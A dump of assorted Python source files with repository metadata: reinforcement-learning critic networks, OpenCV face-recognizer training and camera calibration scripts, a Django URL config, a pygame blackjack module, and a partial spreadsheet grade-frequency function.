    def save_model(self, path=None):
        """Persist this network's weights via the module-level save_model()."""
        save_model(self, path)

    def load_model(self, path, checkpoint):
        """Restore this network's weights via the module-level load_model()."""
        load_model(self, path, checkpoint)
class Critic(nn.Module):
    """State-action value network (critic) for DDPG.

    Concatenates state and action and maps the pair to a scalar Q-value
    through two hidden layers (400, 300) with LayerNorm + ReLU.
    """

    def __init__(self, config: DictConfig, target=False, worker=False):
        """
        config -- configuration object with `running_on`, `agent`, `env`
                  and `memory` sections.
        target -- when True this instance is the target-network copy.
        worker -- when True the network is pinned to the CPU.
        """
        super().__init__()
        self.config = config
        # Device resolution mirrors the Actor: CUDA, then 'mps' on Apple
        # silicon, and plain CPU for rollout workers.
        device = 'cuda' if torch.cuda.is_available() else 'cpu'
        if config.running_on == 'M1':
            device = 'mps' if torch.backends.mps.is_available() else 'cpu'
        if worker:
            device = 'cpu'
        self.device = device
        self.name = 'target_critic' if target else 'critic'
        self.save_path = config.agent.save_path
        self.learning_rate = config.agent.critic_lr
        self.state_dimension = config.env.state_dimension
        self.action_dimension = config.env.action_dimension
        self.batch_size = config.memory.batch_size
        self.linear_block = nn.Sequential(
            nn.Linear(self.state_dimension + self.action_dimension, 400),
            nn.LayerNorm(400),
            nn.ReLU(),
            nn.Linear(400, 300),
            nn.LayerNorm(300),
            nn.ReLU(),
            nn.Linear(300, 1),
        )
        self.optimizer = optim.Adam(self.parameters(), lr=self.learning_rate)
        self.to(self.device)

    def forward(self, x, y):
        """Return Q(x, y).

        Batched inputs are concatenated along dim 1; a single
        (1-D) sample is concatenated along dim 0.
        """
        cat_dim = 0 if len(x.shape) == 1 else 1
        return self.linear_block(torch.cat([x, y], cat_dim))

    def get_weights(self):
        """Return a CPU copy of the state dict (safe to ship between processes)."""
        return {key: tensor.cpu() for key, tensor in self.state_dict().items()}

    def set_weights(self, weights):
        """Load a state dict previously produced by get_weights()."""
        self.load_state_dict(weights)

    def save_model(self, path=None):
        """Persist this network's weights via the module-level save_model()."""
        save_model(self, path)

    def load_model(self, path, checkpoint):
        """Restore this network's weights via the module-level load_model()."""
        load_model(self, path, checkpoint)
# Adapted from:
# https://github.com/PacktPublishing/Deep-Reinforcement-Learning-Hands-On-Second-Edition/blob/master/Chapter17/lib/model.py
class D4PGCritic(nn.Module):
    """Distributional (categorical) critic for D4PG.

    Instead of a scalar Q-value it outputs logits over `n_atoms` fixed
    support values evenly spaced in [v_min, v_max]; `distr_to_q` folds a
    distribution back into a scalar expectation.

    Bug fixes vs. the original:
    * `delta` was assigned as a local but read as `self.delta`, raising
      AttributeError in `__init__`; it is now stored on `self`.
    * `distr_to_q` referenced an undefined name `F`; it now uses
      `nn.functional.softmax`.
    * the support is built with `torch.linspace`, which always yields
      exactly `n_atoms` points (float `arange` can be off by one).
    """

    def __init__(self, config):
        super().__init__()
        self.config = config
        self.obs_size = self.config.env.state_dimension
        self.act_size = self.config.env.action_dimension
        self.n_atoms = self.config.agent.n_atoms
        self.v_min = self.config.agent.v_min
        self.v_max = self.config.agent.v_max
        self.obs_net = nn.Sequential(
            nn.Linear(self.obs_size, 400),
            nn.ReLU(),
        )
        self.out_net = nn.Sequential(
            nn.Linear(400 + self.act_size, 300),
            nn.ReLU(),
            nn.Linear(300, self.n_atoms)
        )
        # Spacing between adjacent atoms; kept as an attribute for callers.
        self.delta = (self.v_max - self.v_min) / (self.n_atoms - 1)
        # Buffer (not a parameter): moves with .to(device) and is saved
        # in the state dict, but is never optimised.
        self.register_buffer("supports", torch.linspace(
            self.v_min, self.v_max, self.n_atoms))

    def forward(self, x, a):
        """Return logits over the atoms for state batch *x* and action batch *a*."""
        obs = self.obs_net(x)
        return self.out_net(torch.cat([obs, a], dim=1))

    def distr_to_q(self, distr):
        """Collapse atom logits into expected Q-values of shape (batch, 1)."""
        weights = nn.functional.softmax(distr, dim=1) * self.supports
        res = weights.sum(dim=1)
        return res.unsqueeze(dim=-1)
| mjadiaz/distributed-ddpg | src/networks.py | networks.py | py | 5,615 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 1... |
73818483305 | import cv2
import numpy as np
from PIL import Image
import os
path = 'dataset'  # folder holding the labelled training images
# LBPH face recogniser to be trained below (requires opencv-contrib).
recogniser = cv2.face.LBPHFaceRecognizer_create()
# Haar cascade used to locate faces in each training image;
# the XML file must sit next to this script.
detector = cv2.CascadeClassifier("haarcascade_frontalface_default.xml")
def getImagesAndLabels(path):
    """Collect cropped face samples and their numeric labels from *path*.

    Every file in the folder is opened, converted to greyscale and run
    through the module-level Haar `detector`.  Each detected face crop is
    collected together with the label parsed from the file name, which is
    expected to look like '<prefix>.<id>.<rest>' (the second dot-separated
    field is the integer label).

    Returns (face_samples, labels) as two parallel lists.
    """
    face_samples = []
    labels = []
    for file_name in os.listdir(path):
        image_path = os.path.join(path, file_name)
        # Greyscale ('L' mode) uint8 array, as the cascade expects.
        grey = np.array(Image.open(image_path).convert('L'), 'uint8')
        # os.path.split gives (head, tail); the tail is the file name,
        # whose second '.'-separated field carries the label.
        label = int(os.path.split(image_path)[-1].split(".")[1])
        for (x, y, w, h) in detector.detectMultiScale(grey):
            face_samples.append(grey[y:y + h, x:x + w])
            labels.append(label)
    return face_samples, labels
# Train the LBPH recogniser on every detected face crop and persist the
# model so recognition scripts can load it later.
print("\n [INFO] Training faces.....")
faces, ids = getImagesAndLabels(path)
recogniser.train(faces, np.array(ids))
recogniser.write('trainer/trainer.yml')  # the 'trainer/' folder must exist
print("\n [INFO] {0} faces trained.".format(len(np.unique(ids))))
{
"api_name": "cv2.face.LBPHFaceRecognizer_create",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "cv2.face",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "cv2.CascadeClassifier",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "o... |
41946408273 | #!/usr/bin/env python
# coding: utf-8
import cv2
import numpy as np
import glob
import os
# --- Left camera calibration -------------------------------------------------
rows = 6
cols = 9
# Reference object points for the chessboard corners (board lies in z = 0).
objp = np.zeros((rows * cols, 3), np.float32)
objp[:, :2] = np.mgrid[0:rows, 0:cols].T.reshape(-1, 2)
# define the paths
path = os.getcwd() + '/images/task_1/'
output_path = os.getcwd() + '/output/task_1/'
# 3d points in real world space
obj_left = []
# 2d points in image plane
img_l = []
images = glob.glob(os.path.join(path, "left_*.png"))
for img_name in images:
    img_color = cv2.imread(img_name)
    img = cv2.cvtColor(img_color, cv2.COLOR_BGR2GRAY)
    ret, corners = cv2.findChessboardCorners(img, (rows, cols), None)
    if ret == True:
        # BUG FIX: only collect point pairs for boards that were actually
        # detected — the original appended `None` corners on failure, which
        # would crash cv2.calibrateCamera.  The refined sub-pixel corners
        # are stored too (the original refined them but kept the raw ones).
        corners2 = cv2.cornerSubPix(img, corners, (11,11), (-1,-1), (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_COUNT, 30, 0.01))
        obj_left.append(objp)
        img_l.append(corners2)
        cv2.drawChessboardCorners(img_color, (rows, cols), corners2, ret)
        cv2.imshow('img', img_color)
        cv2.imwrite(output_path + '/corners.png', img_color)
# Calibration
ret, mtx_left, dist, emp, emp = cv2.calibrateCamera(obj_left, img_l, img.shape[::-1], None, None)
# Undistortion for left_2.png
img = cv2.imread(path + "left_2.png")
h, w = img.shape[:2]
new_mtx_left_matrix, roi = cv2.getOptimalNewCameraMatrix(mtx_left, dist, (w,h), 0)
mapx, mapy = cv2.initUndistortRectifyMap(mtx_left, dist, None, new_mtx_left_matrix, (w,h), 5)
dst = cv2.remap(img, mapx, mapy, cv2.INTER_LINEAR)
x, y, w, h = roi
dst = dst[y:y+h, x:x+w]
if dst[0].size > 0:
    cv2.imwrite(output_path + '/left_2_undistorted.png', dst)
    undistorted_image = cv2.imread(os.path.join(output_path + '/left_2_undistorted.png'))
    cv2.imshow('undistorted image', undistorted_image)
param_path = os.getcwd() + '/parameters'
s = cv2.FileStorage('{0}/left_camera_intrinsics.xml'.format(param_path), cv2.FileStorage_WRITE)
s.write('mtx_left', mtx_left)
s.write('distCoeffs_left', dist)
s.release()

# --- Right camera calibration ------------------------------------------------
rows = 9
cols = 6
objp = np.zeros((rows * cols, 3), np.float32)
objp[:, :2] = np.mgrid[0:rows, 0:cols].T.reshape(-1, 2)
obj_right = []  # 3d point in real world space
img_r = []      # 2d points in image plane
images = glob.glob(os.path.join(path, "right_*.png"))
for img_name in images:
    img_color = cv2.imread(img_name)
    img = cv2.cvtColor(img_color, cv2.COLOR_BGR2GRAY)
    ret, corners = cv2.findChessboardCorners(img, (rows, cols), None)
    if ret == True:
        corners2 = cv2.cornerSubPix(img, corners, (5,5), (-1,-1), (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_COUNT, 30, 0.01))
        obj_right.append(objp)
        img_r.append(corners2)
        cv2.drawChessboardCorners(img_color, (rows, cols), corners2, ret)
        cv2.imshow('img', img_color)
# Calibration
ret, mtx_right, dist_right, emp, emp = cv2.calibrateCamera(obj_right, img_r, img.shape[::-1], None, None)
img = cv2.imread(path + "right_2.png")
h, w = img.shape[:2]
new_mtx_right_matrix, roi = cv2.getOptimalNewCameraMatrix(mtx_right, dist_right, (w,h), 0)
# BUG FIX: the original passed the LEFT camera's distortion (`dist`) here,
# so the right image was undistorted with the wrong coefficients.
mapx, mapy = cv2.initUndistortRectifyMap(mtx_right, dist_right, None, new_mtx_right_matrix, (w,h), 5)
dst = cv2.remap(img, mapx, mapy, cv2.INTER_LINEAR)
x, y, w, h = roi
dst = dst[y:y+h, x:x+w]
if dst[0].size > 0:
    cv2.imwrite(output_path + '/right_2_undistorted.png', dst)
    undistorted_image = cv2.imread(output_path + '/right_2_undistorted.png')
    cv2.imshow('undistorted image', undistorted_image)
s = cv2.FileStorage('{0}/right_camera_intrinsics.xml'.format(param_path), cv2.FileStorage_WRITE)
s.write('mtx_right', mtx_right)
s.write('distCoeffs_right', dist_right)
s.release()
| YB-Joe/Perception_in_Robotics | project_2a/code/task_1/task_1.py | task_1.py | py | 3,567 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.zeros",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "numpy.mgrid",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "os.getcwd",
"line... |
30845959188 | __author__ = 'xuxiaoye'
from django.conf.urls import url
from . import views
# URL routing table.  Django matches patterns top-to-bottom, so the
# catch-all r'^.*$' home-page pattern MUST stay last.
urlpatterns = [
    # Json APIs
    url(r'^jsonResult$', views.jsonResult, name='jsonResult'),
    url(r'^api\/login$', views.apiLogin, name='apiLogin'),
    url(r'^rs$', views.rs, name='rs'),
    # End of Json APIs
    # Wechat backend
    url(r'^weixin$', views.weixin, name='weixin'),
    # End of Wechat backend
    # Common process
    url(r'^back$', views.back, name='back'),
    url(r'^logoff$', views.logoff, name='logoff'),
    # End of Common process
    # Application pages
    url(r'^app1\_1$', views.app1_1, name='app1_1'),
    url(r'^app1\_2$', views.app1_2, name='app1_2'),
    url(r'^app2\_1$', views.app2_1, name='app2_1'),
    # End of Application pages
    # Ajax
    url(r'^ajax$', views.ajax, name='ajax'),
    # End of Ajax
    # Default home page (catch-all — keep last)
    url(r'^.*$', views.index, name='index'),
    # End of Default home page
]
| xiaoyexu/mysite | xiaoye/urls.py | urls.py | py | 926 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.conf.urls.url",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "django.conf.urls.url",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "django.conf.urls.url",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "django.co... |
12143911661 | import pygame
import Classes_objects
import Developer_help
import Load_image
import Sound_effects
import Check_reasults
import Deck_module
import Speical_moves
#-------------------------------------------------------- load data -----------------------------
#----------------------------------------------------players --------------------------------
# Module-level game assets, loaded once at import time.
# -------------------------------------------------- players ------------------
player1 = Classes_objects.get_player('PLAYER1')
dealer = Classes_objects.get_player('DEALER')
table = Classes_objects.get_player('TABLE')   # the pot is modelled as a "player"
# -------------------------------------------------- images -------------------
card_back = Load_image.get_game_img('CARD_BACK')
white_chip =Load_image.get_game_img('WHITE_CHIP')
red_chip =Load_image.get_game_img('RED_CHIP')
blue_chip =Load_image.get_game_img('BLUE_CHIP')
green_chip =Load_image.get_game_img('GREEN_CHIP')
black_chip =Load_image.get_game_img('BLACK_CHIP')
# -------------------------------------------------- buttons ------------------
back_button = Classes_objects.get_button('BACK')
bet_allin_button = Classes_objects.get_button('ALL_IN')
bet_approve_button = Classes_objects.get_button('APPROVE')
bet_clear_button = Classes_objects.get_button('CLEAR')
split_button = Classes_objects.get_button('SPLIT')
# -------------------------------------------------- sound --------------------
button_effect = Sound_effects.get_sound('BUTTON')
chip_effect = Sound_effects.get_sound('CHIP')
def set_bet(win,balance):
    '''
    Let the player compose a bet at the start of a turn.

    win     -- pygame surface the betting UI is drawn on.
    balance -- chips the player currently owns.

    Clicking a chip adds its value (white 1, red 5, blue 10, green 25,
    black 100) to the bet; chips only respond while the balance covers
    them.  Returns:
      * (amount, balance) once an approved bet (2..500) is placed,
      * 'back' if the Back button is clicked,
      * 'quit' if the window is closed.
    '''
    win.fill((0,150,0))
    # Two face-down cards are shown while the bet is being composed.
    win.blit(card_back,(350,350))
    win.blit(card_back,(450,350))
    reset_balance = balance  # kept so the Clear button can restore the balance
    amount = 0
    while True:
        back_button.draw(win,(0,0,0))
        bet_allin_button.draw(win,(0,0,0))
        bet_approve_button.draw(win,(0,0,0))
        bet_clear_button.draw(win,(0,0,0))
        win.blit(white_chip,(40,350))
        win.blit(red_chip,(115,350))
        win.blit(blue_chip,(190,350))
        win.blit(green_chip,(75,425))
        win.blit(black_chip,(150,425))
        pygame.draw.rect(win,(100,150,0),(520,40,300,100),0)#to reset the board
        Developer_help.write(win,'Balance: {}'.format(balance),30,550,50)
        Developer_help.write(win,'bet amount: {}'.format(amount),30,550,100)
        pygame.time.delay(50)
        pygame.display.update()
        for event in pygame.event.get():
            pos = pygame.mouse.get_pos()
            if event.type == pygame.MOUSEMOTION:
                #-------- hover highlighting: only chips the balance covers --------
                if balance >=1:
                    #WHITE
                    if pos[0] in range(40,110) and pos[1] in range(350,420):
                        #HIGHLIGHT THE CHIPS
                        pygame.draw.circle(win,(0,0,0),(75,385),37)
                        win.blit(white_chip,(40,350))
                    else:
                        pygame.draw.circle(win,(0,150,0),(75,385),37)
                        win.blit(white_chip,(40,350))
                if balance >=5:
                    #RED
                    if pos[0] in range(115,185) and pos[1] in range(350,420):
                        #HIGHLIGHT THE CHIPS
                        pygame.draw.circle(win,(0,0,0),(150,385),37)
                        win.blit(red_chip,(115,350))
                    else:
                        pygame.draw.circle(win,(0,150,0),(150,385),37)
                        win.blit(red_chip,(115,350))
                if balance >=10:
                    #BLUE
                    if pos[0] in range(190,260) and pos[1] in range(350,420):
                        #HIGHLIGHT THE CHIPS
                        pygame.draw.circle(win,(0,0,0),(225,385),37)
                        win.blit(blue_chip,(190,350))
                    else:
                        pygame.draw.circle(win,(0,150,0),(225,385),37)
                        win.blit(blue_chip,(190,350))
                if balance >=25:
                    #GREEN
                    if pos[0] in range(75,145) and pos[1] in range(425,495):
                        #HIGHLIGHT THE CHIPS
                        pygame.draw.circle(win,(0,0,0),(110,460),37)
                        win.blit(green_chip,(75,425))
                    else:
                        pygame.draw.circle(win,(0,150,0),(110,460),37)
                        win.blit(green_chip,(75,425))
                if balance >= 100:
                    #BLACK
                    if pos[0] in range(150,220) and pos[1] in range(425,495):
                        #HIGHLIGHT THE CHIPS
                        pygame.draw.circle(win,(0,0,0),(185,460),37)
                        win.blit(black_chip,(150,425))
                    else:
                        pygame.draw.circle(win,(0,150,0),(185,460),37)
                        win.blit(black_chip,(150,425))
                #-------- hover highlighting for the action buttons --------
                if back_button.is_over(pos):
                    back_button.color = (0,0,255)
                else:
                    back_button.color = (255,0,0)
                if bet_approve_button.is_over(pos):
                    bet_approve_button.color = (0,0,255)
                else:
                    bet_approve_button.color = (255,0,0)
                if bet_clear_button.is_over(pos):
                    bet_clear_button.color = (0,0,255)
                else:
                    bet_clear_button.color = (255,0,0)
                if bet_allin_button.is_over(pos):
                    bet_allin_button.color = (0,0,255)
                else:
                    bet_allin_button.color = (255,0,0)
            if event.type == pygame.MOUSEBUTTONDOWN:
                if back_button.is_over(pos):
                    button_effect.play()
                    return 'back'#keyword to signal the outer function game screen
                # Chip clicks move value from the balance into the bet.
                #White
                if pos[0] in range(40,110) and pos[1] in range(350,420) and balance >=1:
                    chip_effect.play()
                    balance-=1
                    amount+=1
                #Red
                if pos[0] in range(115,185) and pos[1] in range(350,420) and balance >=5:
                    chip_effect.play()
                    balance-=5
                    amount+=5
                #Blue
                if pos[0] in range(190,260) and pos[1] in range(350,420) and balance >=10:
                    chip_effect.play()
                    balance-=10
                    amount+=10
                #Green
                if pos[0] in range(75,145) and pos[1] in range(425,495) and balance >=25:
                    chip_effect.play()
                    balance-=25
                    amount+=25
                #Black
                if pos[0] in range(150,220) and pos[1] in range(425,495) and balance >= 100:
                    chip_effect.play()
                    balance-=100
                    amount+=100
                if bet_allin_button.is_over(pos):
                    button_effect.play()
                    amount += balance
                    balance = 0
                if bet_clear_button.is_over(pos):#clears bet amount and reset balance
                    button_effect.play()
                    amount = 0
                    balance = reset_balance
                if bet_approve_button.is_over(pos):
                    #check bet limit
                    if amount <2 or amount > 500:
                        Developer_help.write(win,'Limit is between 2 and 500 $',30,175,100)
                    else:
                        button_effect.play()
                        return amount,balance
            if event.type == pygame.QUIT:
                return 'quit'
#---------------------------------------------------- player1 turn function -------------------------------------------
def player1_turn(win,player1_card1,player1_card2,at_table,player1_balance,player1_name,player1_bet):
    '''
    Run a single player's blackjack turn.

    win             -- pygame surface to draw on.
    player1_card1/2 -- (value, suit) tuples of the initial two cards.
    at_table        -- chips currently in the pot.
    player1_balance -- the player's remaining chips.
    player1_name    -- display name.
    player1_bet     -- the bet placed this round (consumed again by
                       split / double down).

    Returns the final hand value, a [hand1, hand2] pair after a split,
    True on blackjack, False on bust, or 'back' / 'quit' for navigation.
    '''
    #options to bet via function set_bet
    #------------------------------------------------------------ LOAD DATA -----------------------
    #------------------------------------------------------------ buttons -------------------------
    pass_turn_button = Classes_objects.get_button('PASS_TURN')
    hit_button = Classes_objects.get_button('HIT')
    back_button = Classes_objects.get_button('BACK')
    low_ace_button = Classes_objects.get_button('LOW_ACE')
    high_ace_button = Classes_objects.get_button('HIGH_ACE')
    split_button = Classes_objects.get_button('SPLIT')
    double_down_button = Classes_objects.get_button('DOUBLE_DOWN')
    #------------------------------------------------------------- sound --------------------------
    draw_effect = Sound_effects.get_sound('DRAW')
    pass_effect = Sound_effects.get_sound('PASS')
    button_effect = Sound_effects.get_sound('BUTTON')
    # Turn-state flags: which special actions are currently offered.
    is_double_down = False
    is_split = False
    is_ace = False
    is_natural = True   # still True only while the hand is the original two cards
    if player1_card1[0] == 1 or player1_card2[0] == 1 :
        is_ace = True
    card1_image = pygame.image.load(Load_image.get_card_image(player1_card1))
    card2_image = pygame.image.load(Load_image.get_card_image(player1_card2))
    card_x = 400
    card_y = 200
    #in order to view the cards on the screen, get card function imported from load_card_image module allows me to access loaction of image
    #without any trouble
    win.fill((0,150,0))
    draw_effect.play()
    win.blit(card1_image,(card_x,card_y))
    pygame.display.update()
    card_x+=40
    card_y+=40
    #stored coordinations in a variable in order to allow posting of new cards over the board also
    pygame.time.delay(500)
    draw_effect.play()
    win.blit(card2_image,(card_x,card_y))
    pygame.display.update()
    #### check if split ###
    split = False   # becomes True once a split has actually been played
    if player1_card1[0] == player1_card2[0]:
        card1_value = player1_card1[0]
        card2_value = player1_card2[0]
        is_split = True
    #################################turn j,q,k cards to value 10##################
    player1_card1 = Developer_help.correct_card_value(player1_card1)
    player1_card2 = Developer_help.correct_card_value(player1_card2)
    cards_sum = Check_reasults.check_cards_sum(win,is_natural,player1_card1[0],player1_card2[0])
    # Double down is classically offered on a starting total of 9, 10 or 11.
    if cards_sum in range(9,12):
        is_double_down = True
    cards_used = [player1_card1,player1_card2]
    while cards_sum < 21:
        pass_turn_button.draw(win,(0,0,0))
        hit_button.draw(win,(0,0,0))
        back_button.draw(win,(0,0,0))
        if split is False:
            low_ace_button.x = 200
            high_ace_button.x = 200
        #----------------------------------Turn-------------------------------#
        pygame.draw.rect(win,(100,150,0),(470,40,350,100),0)#to reset the board
        Developer_help.write(win,"{}'s Balance: {}".format(player1_name,player1_balance),30,500,50)
        Developer_help.write(win,'Overall bet amount: {}'.format(at_table),30,500,100)
        pygame.time.delay(50)
        pygame.display.update()
        for event in pygame.event.get():
            pos = pygame.mouse.get_pos()
            ###############################################if mouse moves
            if event.type == pygame.MOUSEMOTION:
                if back_button.is_over(pos):
                    back_button.color = (0,0,255)
                else:
                    back_button.color = (255,0,0)
                if pass_turn_button.is_over(pos):
                    pass_turn_button.color = (0,0,255)
                else:
                    pass_turn_button.color = (255,0,0)
                if hit_button.is_over(pos):
                    hit_button.color = (0,0,255)
                else:
                    hit_button.color = (255,0,0)
                #---------------------------------- Speical buttons --------------------------
                if is_double_down:
                    double_down_button.draw(win,(0,0,0))
                    if double_down_button.is_over(pos):
                        double_down_button.color = (0,0,255)
                    else:
                        double_down_button.color = (255,0,0)
                if is_split:
                    split_button.draw(win,(0,0,0))
                    if split_button.is_over(pos):
                        split_button.color = (0,0,255)
                    else:
                        split_button.color = (255,0,0)
                if is_ace:
                    #show buttons first
                    low_ace_button.draw(win,(0,0,0))
                    high_ace_button.draw(win,(0,0,0))
                    if low_ace_button.is_over(pos):
                        low_ace_button.color = (0,0,255)
                    else:
                        low_ace_button.color = (255,0,0)
                    if high_ace_button.is_over(pos):
                        high_ace_button.color = (0,0,255)
                    else:
                        high_ace_button.color = (255,0,0)
            #####################################################if mouse clicks
            if event.type == pygame.MOUSEBUTTONDOWN:
                if back_button.is_over(pos):
                    button_effect.play()
                    return 'back'
                if pass_turn_button.is_over(pos):
                    # Standing after a split returns both hand totals.
                    if split:
                        cards_sum = [hand1,cards_sum]
                    pass_effect.play()
                    is_split = False
                    Developer_help.write(win,'Stand',90,200,100)
                    pygame.display.update()
                    pygame.time.delay(2000)
                    return cards_sum
                if hit_button.is_over(pos):
                    draw_effect.play()
                    # Hitting forfeits the split/natural options.
                    if split:
                        pygame.draw.rect(win,(0,150,0),(40,190,120,275),0)#scrap button
                    else:
                        pygame.draw.rect(win,(0,150,0),(190,190,120,275),0)#scrap button
                    is_split = False
                    is_natural = False
                    new_card = Deck_module.pull_card()#pull card
                    cards_used.append(new_card)
                    card_x+=40
                    card_y+=40
                    #post card image changes cordination so new posting could be shown
                    new_card_image = pygame.image.load(Load_image.get_card_image(new_card))
                    win.blit(new_card_image,(card_x,card_y))
                    pygame.display.update()
                    pygame.time.delay(1000)
                    ##################change j,q,k values to 10
                    new_card = Developer_help.correct_card_value(new_card)
                    if new_card[0] == 1:
                        is_ace = True
                    else:
                        is_ace = False
                    cards_sum = Check_reasults.check_cards_sum(win,is_natural,new_card[0],cards_sum)
                    last_card = new_card
                    # check_cards_sum signals bust with False and 21/blackjack with True.
                    if cards_sum is False:
                        if split:
                            return hand1
                        else:
                            return False
                    elif cards_sum is True:
                        return True
                    #so the function would stop and wont let the game continue
                if low_ace_button.is_over(pos):
                    # Ace counted as 1: nothing to add, just retire the buttons.
                    button_effect.play()
                    if is_double_down:
                        pygame.draw.rect(win,(0,150,0),(40,190,120,275),0)#scrap button
                        is_double_down = False
                    is_ace = False
                    if split:
                        pygame.draw.rect(win,(0,150,0),(40,190,120,275),0)#scrap button
                    else:
                        pygame.draw.rect(win,(0,150,0),(190,190,120,275),0)#scrap button
                if high_ace_button.is_over(pos):
                    # Ace counted as 11: the ace already contributed 1,
                    # so 10 more is added to the running total.
                    button_effect.play()
                    is_ace = False
                    if is_double_down:
                        pygame.draw.rect(win,(0,150,0),(40,190,120,275),0)#scrap button
                        is_double_down = False
                    if split:
                        pygame.draw.rect(win,(0,150,0),(40,190,120,275),0)#scrap button
                    else:
                        pygame.draw.rect(win,(0,150,0),(190,190,120,275),0)#scrap button
                    cards_sum = Check_reasults.check_cards_sum(win,is_natural,10,cards_sum)
                    if cards_sum is True:
                        return True
                    elif cards_sum is False:
                        return False
                if is_split is True:
                    if split_button.is_over(pos):
                        # Splitting costs a second bet and plays the first
                        # hand via Speical_moves.split before resuming here.
                        is_split = False
                        is_double_down = False
                        table.win(player1_bet)
                        player1.bet(player1_bet)
                        player1_balance = player1.balance
                        at_table = table.balance
                        pygame.draw.rect(win,(100,150,0),(470,40,300,100),0)#to reset the board
                        pygame.draw.rect(win,(0,150,0),(40,190,150,275),0)#scrap button
                        Developer_help.write(win,"{}'s Balance: {}".format(player1_name,player1_balance),30,500,50)
                        Developer_help.write(win,'Overall bet amount: {}'.format(at_table),30,500,100)
                        pygame.display.update()
                        pygame.time.delay(50)
                        hand1 = Speical_moves.split(win,(card1_value,player1_card1[1]),(card2_value,player1_card2[1]),player1_name)
                        if hand1 == 'back':
                            return 'back'
                        elif hand1 == 'quit':
                            return 'quit'
                        cards_sum = player1_card1[0]
                        #that a split has happened
                        split = True
                        card_x-=40
                        card_y-=40
                if is_double_down and double_down_button.is_over(pos):
                    # Doubling down doubles the wager on the current hand.
                    if player1_balance >= player1_bet:
                        is_double_down = False
                        table.win(player1_bet)
                        at_table += player1_bet
                        player1.bet(player1_bet)
                        player1_balance-= player1_bet
                        pygame.draw.rect(win,(0,150,0),(40,190,150,275),0)#scrap button
                        pygame.draw.rect(win,(0,150,0),(190,190,120,275),0)#scrap button
                    else:
                        Developer_help.write(win,'There are not enough chips for that',30,150,100)
            if event.type == pygame.QUIT:
                return 'quit'
    #returns 21 if value is equal to 21!
    return cards_sum
| DvirS123/Black_Jack_Game | Player_phases.py | Player_phases.py | py | 14,772 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "Classes_objects.get_player",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "Classes_objects.get_player",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "Classes_objects.get_player",
"line_number": 16,
"usage_type": "call"
},
{
"... |
506845300 | """
Compile some information from a table
"""
import xlrd
import xlwt
import os
def frequencies_by_place(xls, entities_sheet, entities_id, entities_place,
                         data_sheet, output, null=None, out_cols_basename=None,
                         entities_filter=None, cols_exclusion=None):
    """
    Entities table:
    ID_Aluno | codigo_postal
    xxxxxxxx | xxxx-xxx
    xxxxxxxx | xxxx-xxx

    data_sheet:
    ID_Aluno | disciplina_1 | disciplina_2 | disciplina_n
    xxxxxxxx | nota_1       | xxxxxxx      | xxxxxxx
    xxxxxxxx | nota_2       | xxxxxxx      | xxxxxxx
    xxxxxxxx | nota_3       | xxxxxxx      | xxxxxxx

    Output tables (one per disciplina plus a 'general' total):
                    | nota_1   | nota_2   | nota_3   | Mean | Variance
    total           | NrAlunos | NrAlunos | NrAlunos | x    | y
    codigo_postal_1 | NrAlunos | NrAlunos | NrAlunos | x    | y
    codigo_postal_n | NrAlunos | NrAlunos | NrAlunos | x    | y

    In the entities_sheet and data_sheet there must be only one reference
    per entity (duplicated entities are not allowed).
    Filtering entity properties is possible via <entities_filter>
    ("col=value;col2=value2" — all conditions must hold).

    Python-3 fixes vs. the original: dict views are materialised before
    list-concat/sort, the filter comparison now uses each column's own
    value (instead of the stale `val_filter` left by the parse loop), and
    column headers/basenames are sorted once so they cannot misalign.
    """
    import numpy
    from decimal import Decimal
    from glass.tbl.xls.fld import get_columns_position
    from glass.tbl.xls.summ import list_unique_values_column
    from glass.tbl.xls.summ import count_values_column
    from glass.tbl.xls.summ import count_values_column_if_entity_exists
    from glass.tbl.xls.summ import count_values_column_by_entity_property

    def map_dict(histogram):
        """Add 'total', 'mean' and 'stdesviation' entries to a
        value -> count histogram (recomputing them if already present)."""
        if 'mean' in histogram.keys():
            del histogram['mean']
        if 'stdesviation' in histogram.keys():
            del histogram['stdesviation']
        if 'total' in histogram.keys():
            del histogram['total']
        # Get the total of entities
        histogram['total'] = sum(histogram.values())
        # Get mean (only numeric keys participate)
        numerator = 0
        denominator = 0
        std_sample = []
        for v in histogram:
            if type(v) != str:
                numerator += Decimal(v) * Decimal(histogram[v])
                denominator += histogram[v]
                std_sample += [v for x in range(histogram[v])]
        if numerator and denominator:
            histogram['mean'] = numerator / Decimal(denominator)
            histogram['stdesviation'] = Decimal(numpy.std(std_sample))
        return histogram

    # Open xls file
    __xls_file = xlrd.open_workbook(xls, on_demand=True)
    # Parse the optional entity filter: "col=val;col2=val2"
    if entities_filter:
        filters = entities_filter.split(';')
        filters_map = {}
        for flt in filters:
            col_filter, val_filter = flt.split('=')
            filters_map[col_filter] = val_filter
        # py3 fix: dict views cannot be added to a list directly
        interest_col = [entities_id, entities_place] + list(filters_map)
    else:
        filters_map = 0
        interest_col = [entities_id, entities_place]
    __entities_sheet = __xls_file.sheet_by_name(entities_sheet)
    id_place_position = get_columns_position(
        __entities_sheet, interest_col
    )
    if entities_id not in id_place_position.keys():
        raise ValueError('Couldn\'t find the given column id')
    elif entities_place not in id_place_position.keys():
        raise ValueError('Couldn\'t find the position of the place id')
    # Map entities with location: {entity_id: location}
    entities_map = {}
    for row in range(1, __entities_sheet.nrows):
        __id = __entities_sheet.cell(
            row, id_place_position[entities_id]).value
        location = __entities_sheet.cell(
            row, id_place_position[entities_place]).value
        if filters_map:
